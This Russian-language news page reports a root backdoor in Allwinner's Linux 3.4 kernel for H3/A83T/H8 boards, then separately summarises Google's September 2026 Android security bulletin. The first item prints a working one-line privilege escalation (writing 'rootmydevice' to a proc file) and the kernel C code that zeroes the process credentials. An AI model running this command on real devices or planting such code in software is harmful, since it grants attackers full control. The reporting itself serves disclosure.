Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10. 

Google закрыла в Android 180 уязвимостей, некоторые не требуют даже клика

После двух почти месяцев без новых уязвимостей в бюллетенях Android компания Google вернулась сразу с тяжёлой артиллерией. Сентябрьское обновление безопасности закрывает 180 дыр, включая критические проблемы с удалённым выполнением кода без участия пользователя.

Обновление традиционно разделили на два уровня. Патч 2026-09-01 устраняет 95 уязвимостей в Android Runtime, Framework, System, Setup Wizard и компонентах Project Mainline, часть которых обновляется через Google Play.

Самые неприятные находки засели в компоненте System, отвечающем за значительную часть базовых функций смартфона. Здесь закрыли 56 уязвимостей, причём 23 из них получили статус критических.

Эксплуатация некоторых ошибок могла привести к удалённому выполнению кода, повышению привилегий или отказу в обслуживании. Пользователю при этом необязательно нажимать подозрительную кнопку, в отдельных сценариях атакующему хватило бы самой уязвимости.

Ещё 37 проблем исправили во Framework, включая три критические, и одну — в Android Runtime.

Вторая часть обновления с уровнем патча 2026-09-05 устраняет ещё 85 уязвимостей в ядре Android и компонентах Arm, Qualcomm, MediaTek, Unisoc, Imagination Technologies, Tsingteng Micro и других производителей. Именно этот уровень содержит полный сентябрьский комплект исправлений.

Эксперты отдельно выделили CVE-2026-28662 — ошибку повреждения памяти, связанную с Wi-Fi. По их оценке, она потенциально позволяет удалённо выполнить код без дополнительных привилегий и действий владельца устройства.

Отдельных бюллетеней для Wear OS, Android XR и Android Automotive OS в сентябре нет, однако их обновления включают исправления из общего списка.

RSS: Новости на портале Anti-Malware.ru